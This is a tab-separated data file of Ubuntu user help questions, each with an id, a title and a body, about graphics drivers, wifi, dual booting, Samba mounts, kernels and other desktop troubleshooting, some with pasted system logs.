329930	using nvidia graphics card on kubuntu 13.04	i tried to install the nvidia graphics card using the answer in `` you do not appear to be using the nvidia x server '' ( screenshot included ) since i was having rendering issues and my laptop generates a lot of heat irrespective of graphics usage . but now my screen resolution is reduced to 640x480 , though the heating problem seems to be solved . when i open the nvidia settings using optirun nvidia-settings -c :8 it shows the `` x server display configuration '' - > '' virtual size '' as 640x480 . increasing this to 1280x720 and restarting has no effect . even the setting goes back to 640x480 . i want to solve this problem . it will be best if i could use the switchable graphics feature . otherwise , only using the inbuilt intel gpu or only using the nvidia graphics card with the nvidia driver so as to prevent this perpetual heating , will do as well . specs : ubuntu version : 13.04 kde version : 4.10.5 os version : linux 3.8.0-27-generic graphics card : nvidia geforce gt 630m laptop : asus k53-sm
329931	system crashes ( screen does n't get updated ) when playing 'heavy ' videogames	apparently my system is crashing ( i.e . the screen is frozen , but i can connect via ssh - kill -9 -1 does n't kill all my processes though ) when i play intensive videogames/3d benchmarks ( sc2 , hon and the unigine valley benchmark ) . what i 've experienced so far is that apparently the gpu ( nvidia 470 gtx ) skyrockets to 91+ degree of temperature . if i keep the case open this behaviour usually does n't happen . what do you think it is ? is it my gpu bruned and does n't tolerate high temperatures anymore ? i 'm using ubuntu 12.04 ( x86-64 ) and driver nvidia 310.14 . cheers
329932	slow wifi connection on ubuntu 13.04 with rtl8723ae realtek wireless driver	so i have installed ubuntu four days ago on my toshiba satellite-c855-2cf and everything is going well , but i noticed that my wifi connection is slow and when i did a speed test online i found that i have only 0.9 mbps and when i did the speed test on windows i have 4mbps so can someone tell me how can i fix this problem ? if do n't find any solution for this problem i 'll have to go back to windows and leave ubuntu . $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' sagem_c40b '' mode : managed frequency:2.437 ghz access point : 4c:17 : eb:3e : c4:0c bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=34/70 signal level=-76 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:6967 missed beacon:0 $ lsmod | grep rtl rtl8723ae 86459 0 rtlwifi 79673 1 rtl8723ae mac80211 606457 1 rtlwifi cfg80211 510937 2 mac80211 , rtlwifi $ lspci | grep rtl 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) $ sudo lshw -class network *-network description : wireless interface product : rtl8723ae pcie wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 2c : d0:5a:3e : ee : bb width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8723ae driverversion=3.8.0-27-generic firmware=n/a ip=192.168.1.6 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:3000 ( size=256 ) memory : c2400000-c2403fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 70:54 : d2 : d6 : d0:2b size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : c0004000-c0004fff memory : c0000000-c0003fff
329933	only around 50mb/sec max network transfer ; had 70-100mb/s on windows , ubuntu reports gigabit speeds , why ?	i have two different computers , one a desktop , the other a laptop . both have different network controllers in them ( one qualcomm atheros , other realtek ) . both using the included driver . both computers have xubuntu 13.04 x64 currently , but the results are reproducible on 13.10 ( with kernel 3.10 and 3.11 daily ) and 12.04.2 , and lubuntu 13.04 . the results are also the same on the desktop if i use a compiled realtek driver ( 8168 i think ) . if i try restoring files from a backup computer , the transfer speed at a most goes around 50mb/sec , on both machines . network information is reporting 1000 mb/s . the same computers under windows can easily get 70-90mb/s transfer speeds while restoring backups . just to be clear , i 'm dragging some folders from a samba share on another computer , to my desktop and laptop ( not at the same time ) using xubuntu 's file manager , thunar . any idea what 's up ?
329934	can i uninstall specific version of kernel ?	i upgraded from linuxmint 14 to 15 . after the upgrade the normal boot pointed to `` linux mint 15 mate 64-bit , 3.8.0-27-generic '' in the grub file . the normal boot fails , it freezes on an error - `` kernel panic - not syncing - fatal exception in interrupt '' . i searched the internet and found that this is an unresolved kernel bug . i use a lenovo g550 laptop . so , i boot through a previous version `` linux mint 15 mate 64-bit , kernel version 3.5.0-32-generic '' and it works fine . my question how can i fix it ? can i remove the kernel version 3.8.0-27 and update grub to make 3.5.0-32 as my normal boot ? if yes , how can i do this with minimum risk ? can i do this via the synaptic package manager ? thanks .
329939	select and copy text from gui elements	is there some tool or hack that can extract and copy text from gui elements ( mostly qt and gtk ) positioned under a mouse cursor : like button captures , window titles etc. ? linux screen reader can certainly read this text , but how to simply copy it ?
329944	can not play internet stations with media player ( lubuntu 13.04 )	i am able to play flash videos now , but not internet music . i get the following error message : could not load mplayerplug-in is now gecko-mediaplayer 1.0.8 . i installed vlc with the command sudo apt-get install vlc browser-plugin-vlc but i still could not get anything working .
329948	does ubuntu support touchscreen laptops ?	is it possible to use a touchscreen display on a laptop with ubuntu , as in like , being able to scroll with my touchscreen and stuff ?
329951	ubuntu 13.04 wo n't shutdown or restart ( just a black screen )	i have looked all over the internet trying to find a fix , but i ca n't seem to find one . i have a custom built pc running an amd processor , nvidia graphics , 16gb of ram and a 1tb hdd for ubuntu . i am not trying to dual boot , i just have ubuntu 13.04 on the hard drive nothing else . every time i press 'shutdown ' or 'restart ' , it goes through its normal shutting down thing ; but , after that , there is just a black screen and nothing more . nothing happens , it 's just black . the only way for me to turn off ubuntu at the moment is to press shutdown , wait for the screen to go dark , and then force shutdown it by pressing the physical shutdown button on the pc . could someone please tell me what is wrong and how i can get ubuntu to work correctly ? ( never had this problem when i was dual booting on my old hdd . ) p.s . i am able to log out . after running sudo shutdown it gave me an error this is the error : 'modem-manger [ 5062 ] : could not get the system bus . make sure the message bus daemon is running ! message : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory modem-manger [ 5078 ] : modeubuntu 13.04rsion 0.6.0.0 ) starting ... modem-manger [ 5078 ] : could not get . . . . m bus . make sure the message [ fail ] e * will now switch to single-user modenect to socket /var/run/dbus/system_bus_so root @ mauritz-ubuntu : ~ # irectory' and then just a ton of ok checking 's , to me it seems like much of the text that it is displaying is overlapping on other text , so thats why it seems really weird . second error ( running sudo shutdown as root ) : '' sudo shutdown now *disabling power management ... [ ok ] saned disabled ; edit /etc/default/saned speech-dispatcher disabled ; edit /etc/default/speech-dispatcher * asking all remaining processes to terminate ... [ ok ] * killing all remaining processes ... [ fail ] * will now switch to singel-user mode ''
329954	can i change the contents of the sound icon in the tray ?	i installed a number of music players to try them out . i noticed that several of them appear in the drop down menu when i click the sound icon in the tray . i would like to change which programs show up in that list and the order they appear . is there any way to do that ? using 13.04 . thanks
329959	boot from usb or dvd : reboot and select proper boot device	my system is running xubuntu . when i try to install another os via usb or livecd specifically ( linux in usb , windows in cd ) , i keep getting the message from system : reboot and select proper boot device or insert boot media in selected boot device . i have set the usb or dvd the first boot item , and the usb and cd is bootable in another computer , even the usb and cd is bootable in this computer before installing xubuntu .
329961	stream youtube audio over wifi network	i want to have my youtube video playing on my computer , and i want to listen to the audio on my android phone , mostly because i can not be bothered taking off my earphones and plugging them into the computer ( at work ) . how do i stream all audio output to android phone ?
329962	new ubuntu install onto new hard drive that i also want to use for win 7 backups	so i have a brand new 1tb hard drive i want to partition off to install ubuntu , but i want to use the majority of the space on it as my backup drive for windows 7 . i 've got it wired up and ready to be formatted in windows 7 , but i 'm not sure exactly how i should proceed or even if this is a good idea to begin with . thoughts ?
329963	difficulty dualbooting w/ win 8	i 've got a curious problem . i 'm trying to dual boot from two separate hard drives , and let the windows bootloader take control . i 've installed ubuntu on the second drive , and added the entry to easybcd , however every time i select to boot to my ubuntu entry , it gives me `` grub4dos '' .
329964	gnome3 : which program do i use to set an icon for my user account ?	i had a hard time installing gnome3 , and i 'm afraid that i brok 'd something . if i click on my user account in the top right corner , and then click on the default icon . the menu shuts and i expect that a program would open to change the icon , but nothing happens . so my question is : which program will set this user icon for me ?
329971	installed ubuntu 13.04 alongside with a pre-installed windows 8 . neither boot !	i 'm trying to install ubuntu on an e-series vaio with windows 8 pre-installed . to do so , first i shrinked windows 8 partition ( using the windows software ) . then i burnt a 64-bit ubuntu 13.04 live dvd . i disabled secure boot and fast startup ( not uefi ) . i had problems with the installation , as afer selecting the install option the screen started to flash and flicker . i solved it using nomodeset and installed it . i made an 8gb partition for swap ( as that 's my ram capacity ) , a 20gb one for root and a big one for /home . i was n't sure if i had to make any of those primary instead of logical , but the installation ended correctly . when i start now the pc , grub loads and shows me both windows 8 , ubuntu , and the vaio system setup . but , if i select ubuntu , it boots ( i can hear the ubuntu welcome sound ) but the screen flickers and flashes . i tried to use nomodeset , but that somehow starts ubuntu in text mode ( terminal ) . and if i choose windows 8 , it says that `` drivemap '' could n't be found . `` invalid efi file path '' . the system setup boots correctly . i 'm a n00b , and i 'm really lost . help , please !
329972	ubuntu 13.04 : logout button has gone missing	somehow my logout/poweroff button has gone missing from the desktop , how do i restore it ? also i used to be able to select the wm to use before logging in ( e.g . unity , gnome etc ) , but i do n't get that option anymore , how do i restore that ? my update log is at http : //pastebin.com/wcwbw7iu
329973	driver for old wireless card	i have an old buffalo wli2-pci-g545 model wireless card and ubuntu wo n't recognize it . i was wondering if there was some way i could rig it to work . thanks .
329976	`` unknown unclaimed register '' system76 gazelle , haswell	i recently purchased a gazelle professional ( haswell ) from system76 . this is my first step in transitioning from mac to ubuntu and i need some help . from the very fist start up i had an error message , unknown unclaimed register . i also get a flash across the screen right before the message appears . system76 has dismissed my problem by saying it is n't hardware . i 'm running ubuntu 13.04 , which is what came on my laptop . what can i do to solve this problem ?
329979	ubuntu not booting and package missing	my ubuntu is not booting anymore , after i wrote this command on terminal : sudo apt-get autoremove eclipse then logged off . now it keeps trying to boot , but fail in some background-proccess on the booting screen ( i can see the ones that fails if i press some key in the booting screen ) . when i go to ubuntu advanced options- > ubuntu ( recovery mode ) and try to do something , like repair packages , it says : '' libapt-pkgso.4.12 : can not open shared file '' [ ... ] or something like that . i 'll try to be more clear : the apt-get is missing on my console , i ca n't get things by apt-get ! what can i do ? how can i install this package without booting ubuntu ? is there any kind of 'recovery point ' in ubuntu that i can use ? i ca n't lost my files inside ubuntu 's partition !
329980	how tp switch back to dynamic ip from static ?	just recently , i used portforward.com 's static ip tool to make my ip static . everything was going fine until my connection got super slow and i could n't play any games . now i would like to change it back and i have edited what it told me to do here i need to reset my computer 's ip address to dhcp from static and it is still not changing my ip back to normal and making it dynamic . any help would be much appreciated .
329982	ubuntu software centre is very slow	ubuntu software center is very slow , i would prefer the terminal to install or remove app because it is slow . do you all experience the same ? . for example if you click on install or remove on the 2nd application , the download bar will not show any progress . eventually it gets downloaded but the gui does n't show it immediately .
329984	help regarding .uif and .cue .bin	i am facing difficulties loading or mounting .uif .cue .bin files on my ubuntu 13.04 fully updated . can somebody help ? i have tried a few options by googling and experimenting on my desktop , it did n't work though : - (
329993	ubuntu 13.04 not recognising usb hdd docking station	i have a usb sata/pata dual hdd docking station called all in 1 hdd docking which worked under windows 7 , but ubuntu ca n't recognise it . when it is connected , the dock 's two lights ( one red , one blue ) flash every second , whether there is an hdd in the slot or not . lsusb lists all the usb devices ubuntu knows about , and there is nothing for the dock . a cd that came with the device contains only windows drivers . i am at a loss to know how to proceed . any help appreciated .
329997	screen interferes with vim	i am running vim7.3 in screen 4.0 in konsole 2.10.5 on kde 4.10.5 . in vim , i have assigned a normal mode macro to ctrl-downarrow . fwiw , it is used to go to the last line before the blank line from current position . when i run vim in konsole , it works fine . when i have screen running , it does not function . instead , the cursor moves apparently arbitrarily . what do i need to do to get this sorted out ? ps . i have not tagged it with screen . for the screen tag refers to display
329998	bbswitch problem in ubuntu 13.04 !	i have a sager np8290 laptop with nvidia geforce gtx 770m ( optimus ) . i 'm currently trying to get bumblebee to work with ubuntu 13.04 . through all the mess , and fresh system installs , i have been able to get bumblebee to work i believe , because i can run the optirun 's glxspheres and it works fine . i ca n't run bbswitch though . i know the main nvidia card is running constantly because the computer is getting very hot and the fan keeps revving . running sudo modprobe bbswitch gives error : could not insert 'bbswitch ' : no such device and running bumblebeed -vv gives [ 2433.048330 ] [ debug ] found card : 01:00.0 ( discrete ) [ 2433.048343 ] [ debug ] found card : 00:02.0 ( integrated ) [ 2433.048346 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 2433.048534 ] [ info ] configured driver : nvidia [ 2433.048541 ] [ debug ] skipping auto-detection , using configured driver 'nvidia' [ 2433.048604 ] [ debug ] process /sbin/modprobe started , pid 23369 . [ 2433.048641 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 2433.049564 ] [ debug ] sigchild received , but wait failed with no child processes [ 2433.049710 ] [ info ] loading driver bbswitch ( module bbswitch ) [ 2433.049765 ] [ debug ] process modprobe started , pid 23370 . error : could not insert 'bbswitch ' : operation not permitted [ 2433.050644 ] [ debug ] process with pid 23370 returned code 1 [ 2433.050735 ] [ error ] module bbswitch could not be loaded ( timeout ? ) [ 2433.050739 ] [ debug ] bbswitch is not available , perhaps you need to insmod it ? [ 2433.050742 ] [ info ] skipping switcheroo pm method because it is not explicitly selected in the configuration . [ 2433.050746 ] [ warn ] no switching method available . the dedicated card will always be on . [ 2433.050749 ] [ debug ] active configuration : [ 2433.050751 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 2433.050754 ] [ debug ] x display : :8 [ 2433.050757 ] [ debug ] ld_library_path : /usr/lib/nvidia-325 : /usr/lib32/nvidia-325 [ 2433.050760 ] [ debug ] socket path : /var/run/bumblebee.socket [ 2433.050763 ] [ debug ] pidfile : /var/run/bumblebeed.pid [ 2433.050766 ] [ debug ] xorg.conf file : /etc/bumblebee/xorg.conf.nvidia [ 2433.050768 ] [ debug ] xorg.conf.d dir : /etc/bumblebee/xorg.conf.d [ 2433.050771 ] [ debug ] modulepath : /usr/lib/nvidia-325/xorg , /usr/lib/xorg/modules [ 2433.050774 ] [ debug ] gid name : bumblebee [ 2433.050777 ] [ debug ] power method : auto [ 2433.050780 ] [ debug ] stop x on exit : 1 [ 2433.050783 ] [ debug ] driver : nvidia [ 2433.050785 ] [ debug ] driver module : nvidia-325 [ 2433.050788 ] [ debug ] card shutdown state : 1 [ 2433.050844 ] [ debug ] process /sbin/modprobe started , pid 23371 . [ 2433.050886 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 2433.051741 ] [ debug ] sigchild received , but wait failed with no child processes [ 2433.051748 ] [ debug ] configuration test passed . [ 2433.051766 ] [ error ] can not open or write pidfile /var/run/bumblebeed.pid.` also , dmesg | grep bbswitch gives [ 2.604556 ] bbswitch : module verification failed : signature and/or required key missing - tainting kernel [ 2.606299 ] bbswitch : version 0.7 [ 2.606303 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.606307 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.606309 ] bbswitch : no discrete vga device found [ 2.620803 ] bbswitch : version 0.7 [ 2.620809 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.620812 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.620814 ] bbswitch : no discrete vga device found [ 2.632556 ] bbswitch : version 0.7 [ 2.632562 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.632566 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.632569 ] bbswitch : no discrete vga device found [ 2.643909 ] bbswitch : version 0.7 [ 2.643914 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.643918 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.643920 ] bbswitch : no discrete vga device found [ 2.652674 ] bbswitch : version 0.7 [ 2.652678 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.652682 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.652683 ] bbswitch : no discrete vga device found [ 2.680709 ] bbswitch : version 0.7 [ 2.680714 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.680717 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.680719 ] bbswitch : no discrete vga device found [ 2.691707 ] bbswitch : version 0.7 [ 2.691711 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.691713 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.691715 ] bbswitch : no discrete vga device found [ 2.700902 ] bbswitch : version 0.7 [ 2.700907 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.700910 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.700912 ] bbswitch : no discrete vga device found [ 2.711751 ] bbswitch : version 0.7 [ 2.711755 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.711758 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.711760 ] bbswitch : no discrete vga device found [ 2.724398 ] bbswitch : version 0.7 [ 2.724403 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.724429 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.724433 ] bbswitch : no discrete vga device found [ 2.752170 ] bbswitch : version 0.7 [ 2.752176 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2.752179 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2.752181 ] bbswitch : no discrete vga device found [ 1369.306337 ] bbswitch : version 0.7 [ 1369.306343 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 1369.306349 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 1369.306352 ] bbswitch : no discrete vga device found [ 2356.234401 ] bbswitch : version 0.7 [ 2356.234406 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 2356.234409 ] bbswitch : can not find acpi handle for vga device 0000:01:00.0 [ 2356.234412 ] bbswitch : no discrete vga device found` i am running the updated kernel now $ uname -r 3.9.4-030904-generic i have no other idea why i ca n't get bbswitch to run . i would like to turn off the nvidia card to prevent it from getting so hot ! any ideas , or links to other solutions would be appreciated .
329999	driver and hardware compatiblity	i am looking at a laptop and there are two things that i think might not be compatible . it has : a dual sli-nvidia gtx 650 , and a hybrid drive 1tbhdd+16gb ssd . here 's the laptop . so , i want to know if it would be compatible out of the box or i 'd need specific driver or it might not work at all on ubuntu ?
330001	how to let smb share mount via fstab assign full permission to new created file or directory ?	how can we fstab mount a samba share that give permission 0777 ( to every samba users in the write list ) for new created directory or files ? e.g . i created a new directory in client pc ( ubuntu 12.10 ) , and want the directory to have permission drwxrwxrwx in the server ( ubuntu 12.04 lts ) . dir_mode=0777 , file_mode=0777 already been set in the fstab , still no effect . i can read/write the mounted smb share , but other users in the write list can not write to the new directory created by me . the permissions in server is always drwxr-xr-x . other option that i have tried 'nounix ' , 'noperm ' , 'uid ' . but still can not get it work . any idea ?
330003	selective package updates through apt-get	i 'd like to install a newer package ( xen-tools ) from quantal via apt-get . the package is called xen-tools . it does n't contain any compiled sources . i need it on precise because you can not use xen-create-image with the -- dist=precise option . why ? because there is not option for precise . creating a symbolic link does n't fix it . i 've tried patching the xen-create-image script manually but it 's not creating a working bootable vm unfortunately . what is the best way of achieving this without pulling in everything but xen-tools from quantal ? as far as i know it does n't contain any dependencies or sources . note : i have tried pinninghowto , but /etc/apt/apt.conf.d/01ubuntu is missing and i ca n't see where you set the default .
330009	analogue to windows combination ctrl+alt+del	combination ctrl+alt+del in windows calls task manager . you can see running processes and kill any task . is there anything like this in ubuntu ? thanks in advance
330013	strange message now appears when i open up my terminal	i was recently installing mysql and everything seemed to go just fine , however , when i opened up my terminal to test a few things out , i got a strange message : no command '“alias ' found , did you mean : command '0alias ' from package 'zeroinstall-injector ' ( universe ) “alias : command not found “alias android-disconnect=”fusermount -u /media/galaxynexus” daniel @ pangolin : ~ $ i have never seen this before and have no idea exactly what it means . any help would be much appreciated .
330014	is there a program like panel daemon or fire daemon for ubuntu server 12.04 ?	i need a web style interface where i can log onto a website and restart certain processes . i know that there is fire daemon and panel daemon that you use for windows . i was wondering if anybody knew of a program like that for ubuntu ?
330015	ubuntu 13.04 and windows 8 dual boot problem where windows 8 does n't boot	i will brief about the problem , that how it started . i purchased a sony vaio ( sve15133cnw ) laptop on may-2013 , with pre-installed windows 8 after couple of days i installed ubuntu 13.04 using usb in a dual boot mode ; both were working fine for few weeks one day , while the ubuntu shutdown was still in progress , i closed the lid ( i did this before as well many times ) ; but this time it did some corruption while next starting up , it directly booted to windows 8 and that happened repeatedly . the grub menu never really appeared . during trying to fix it , i hard shut down windows 8 few times . i posted a question as well then , i tried with `` boot repair '' tool and finally the grub was back , i was able to login to ubuntu without any problem unfortunately , windows 8 would never really boot after that ; it will do some auto repair stuff and then give an error and then go back to the grub menu . after searching numerous forums , there is no luck ( from this forum too , i tried many suggestions which also include this thread and this thread ) . i tried every possible option , like editing the windows 8 entry by pressing `` e '' and changing the current gpt3 into gpt1 till gpt8 . but it always gives the same error : ca n't find command 'drivemap' invalid efi file path at the max after repairing , it reaches to the error which points out to 0xc000021a . for many days , i am in this situation . if someone can fix this , i would be really thankful . : ) on other side , i do n't have much data in windows 8 , but have lots in ubuntu . as a final resolution , is there a way by which i can re-install windows 8 without affecting ubuntu partition ? i can still access windows memory inside ubuntu and here are some of the files which are appearing under `` c : \windows\system32\logfiles\srt '' : srttrail.txt . disklayout.txt bcdinfo.txt please let me know if something more is needed . this is the latest result in pastebin of running boot repair in ubuntu . here are some of the photos if they help :
330018	what is the standard for naming deb file name ?	i want to find out the standard for the deb file names . for example i have file with the name foo_1.0.0-1_all.deb . as i have found out in debian faq there is such convention : < foo > _ < versionnumber > - < debianrevisionnumber > _ < debianarchitecture > .deb but this is not a standard . it does not answer to a a lot of questions . for example : how long can be ? what are the permitted characters in ? what values can be in ? is there any standard that describes deb file name in detail ?
330023	setting path env variable not working	i want to set sonar-runner bin directory in path in .profile directory in ubuntu . when i execute echo $ path it is showing the path that i set , but when i try to run sonar-runner.bat file using ./sonar-runner -h` the results i get are bash : ./sonar-runner : no such file or directory but if i run the same command ./sonar-runner -h from its directory , it runs just fine . i know its env var problem . but i am not able to resolve it . please can someone help ?
330024	which version of ubuntu uses kernel 2.6.30.10	hi , i need an iso image of ubuntu which uses kernel 2.6.30.10. , where it would be available ? please could you provide me with a link ? i would like to do few experiments with it .
330025	i can not install ubuntu-sdk	i have followed up to getting an ubuntu touch . but i can not get ubuntu sdk . • os : ubuntu 12.04 64-bit • language : korean i opened the terminal and ran sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get install ubuntu-sdk and i got the following results : gpg : key c7122f9b : public key `` launchpad ppa for ubuntu sdk team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok ... e : could not find ubuntu-sdk what 's wrong ?
330026	configure & connect wireless network through the command line in ubuntu 12.04	the wireless networks are detected , but i am unable to connect to them . here is the code i 've tried : sudo iwlist wlan0 scan ( working ) iwconfig wlan0 essid `` network name '' key s : '' key '' ( error for wireless request `` set encode '' ( 8b2a ) ) set failed on device wlan0 ; invalid argument wpa_passphrase essid password > /etc/wpa_supplicant.conf wpa_supplicant -b -dwext -iwlan0 -c/etc/wpa_supplicant.conf ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument then i tried by adding ctrl_interface=/var/run/wpa_supplicant at the beginning of file wpa_supplicant.conf and running the same wpa_supplicant command but result is ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument ctrl_iface exists and seems to be in use - can not override it delete '/var/run/wpa_supplicant/wlan0 ' manually if it is not used anymore failed to initialize control interface '/var/run/wpa_supplicant ' . you may have another wpa_supplicant process already running or the file was left by an unclean termination of wpa_supplicant in which case you will need to manually remove this file before starting wpa_supplicant again . how do i connect to a specified wireless network through command line in ubuntu 12.04 ?
330030	amd radeon hd 7310 hdmi functionality on any ubuntu ?	i found a great deal on a desktop pc that i would like to run and a media server with ubuntu and xbmc . it uses an amd radeon hd 7310 and supports hdmi output via windows 8 . i need to know that ubuntu & some sort of drivers can push video out before i make this purchase . full specs on the unit can be found here . thanks in advance !
330035	specify default size of particular desktop icon	i only recently made the switch to linux ( great os , btw . i very much enjoy the shell . way more flexible than anything i 'm used to ) but am already at the point that i 'd like to deploy a small app i designed over the last two weeks . thing is , i want it to look good . i want it to be a complete experience , so everything should look and feel great from the start . i really enjoy the look and feel of amiga'esque/macosx'esque icons and would like to try something similar . i. e. the original size of the icon , when my app is first installed , should be much larger than the default size of most other app icons . i know there must be a way to do this , since steam 's default icon is almost three times as large as all the other icons on my desktop . question is , how can i achieve this ? is there something i can put into the desktop entry ? or perhaps someone would be able to help me locate the steam icon file ( it 's a png , as far as i can tell ) ? `` whereis steam '' yields nothing of the sort unfortunately , and the only steam icon inside /usr/share/pixmaps is the windows/wine steam one . i also found an icon inside /usr/share/icons/hicolor/256x256/apps . unfortunately , it 's lower res and will still always revert to what looks like 32x32 . ps : i 'd like to use .svg for my icon , if that matters ( i assume it 's less obvious to set a default resolution for a scalable image format . hopefully , i 'm proven wrong though ) .
330038	how can i use grep to view only part of bfgminer which is being run in screen over ssh ?	okay , bear with me on this . i 'm using a program called bfgminer , which hopefully you know is a bitcoin mining program . anyway . it updates every second a few lines that look like this : device 0 : xxxx device 1 : xxxx this is just the basics of what i am concerned about . i need a way to view these few lines from a terminal window if possible . the only issue that i have is that i can not seem to get grep to update the pipe i have coming into it . i have the command running on another machine , and that machine also has a screen with bfgminer running . so to access bfgminer 's window , i am running a script to ssh user @ 192.1681.1.11 screen -r this gets me to the screen , but i have to press ctrl+a , then d to detach it so it will continue to run . if i run ssh user @ 192.1681.1.11 screen -r | grep `` ^ dev '' i can view all devices connected . good so far . however , it does not update every few seconds like i need it to ... edited : figured out what to do . see answer .
330042	a lot of arp requests from a single system	my network uses static ip addresses and has a router . i used wireshark to detect a lot of arp requests from a single system , which seems to be running abnormally to me . as i 'm new to wireshark i do n't know how to solve this problem . please help . here 's a screenshot : is this behavior normal ? its ip address is 10.0.0.6 and routers ip is 10.0.0.1 p.s . earlier rsyslog was configured on the system which sent logs to the system at the ip address 10.0.0.5
330047	why is apache failing to restart ? `` review the situation by hand ''	ubuntu @ fast : ~ $ /etc/init.d/apache2 restart * restarting web server apache2 [ fail ] * there are processes named 'apache2 ' running which do not match your pid file which are left untouched in the name of safety , please review the situation by hand . what is going on ? cat /var/run/apache2.pid 1342 pidof apache2 1723 1468 1467 1466 1440 1439 1438 1433 1348 1347 1342
330048	unknown filesystem error at boot	after upgrading 12.04 lts kernel from 3.2.0-48 to 3.2.0-51-generic , grub stops at startup with message unknown filesystem . pressing enter it boots normally . booting to a previous kernel works nice . can anyone help me to get rid of this error ? peter
330049	problem in intel software installation	i try to install intel parallel_studio_xe_2013_update4 on ubuntu 12.04 . after activating product key successfully , i received the following error during the installation : the following required for installation commands are missing : g++ can any one assist me in this regard ?
330056	notifications less volatile alternative	i need a mechanism similar to notifications send-notify , but which would be more permanent - i would like the notification to only disappear when the user clicks on it , no sooner . if user turns off the computer without clicking on the notification , i would like it to still be there on re-booting the system . i think i am looking for something similar to windows actions center . are there any tools to achieve my goal ? if not , what would be the alternatives ? can i , for example , manually add new unread e-mail in my e-mail client ?
330061	ubuntu 12.04 virtualbox firewall ?	is it possible for me to completely shut off a network connection , or block all traffic on my non-virtualized ubuntu so that only my virtual ubuntu is allowed to communicate with the internet ? i have tried to do this using ufw but if i block everything on the host side then the client shuts down to .
330065	ubuntu 12.04 kernel upgrade to 3.10	after reviewing many guides about kernel upgrades - and even following a tip from : http : //syntaxionist.rogerhub.com/ubuntu-on-the-lenovo-thinkpad-x230.html to upgrade the kernel of ubuntu 12.04 to 3.4 , i still experiencing problems with my bluetooth ( really laggy for sound , and keyboard will not stay connected ) , i 'm considering upgrading to a current kernel ( for example 3.9 or 3.10 ) . this is the question that i do n't understand : from the kernel list in the ubuntu repository - http : //kernel.ubuntu.com/~kernel-ppa/mainline/ the latest kernel for 12.04 ( precise ) is 3.4 . is it ok to install a kernel that is above 3.4 on ubuntu 12.04 like 3.10 ? thanks .
330066	how to block all but one or two websites without browser extensions ?	i want to block all , but one or two websites . this question is therefore relatively close to , but different from the following parental controls with different settings for different users ( difference : parental control is not really a good flashship . ) how to block websites temporarily ? ( difference : this is on how to block a particular website . i want to block everything except the ones i need . ) i know that this can be done with leechblock ( for ff ) or something similar for other browsers . i think that is not a very clean solution , because it is browser-based . i know this was both possible and easy with firestarter but that package is deprecated . i am looking for something which is both easy ( not manually editing hosts , but a script for instance ) and systemwide . it can use the cli . i would love a relatively detailed answer rather than just links to other websites - screenshots would be most welcome .
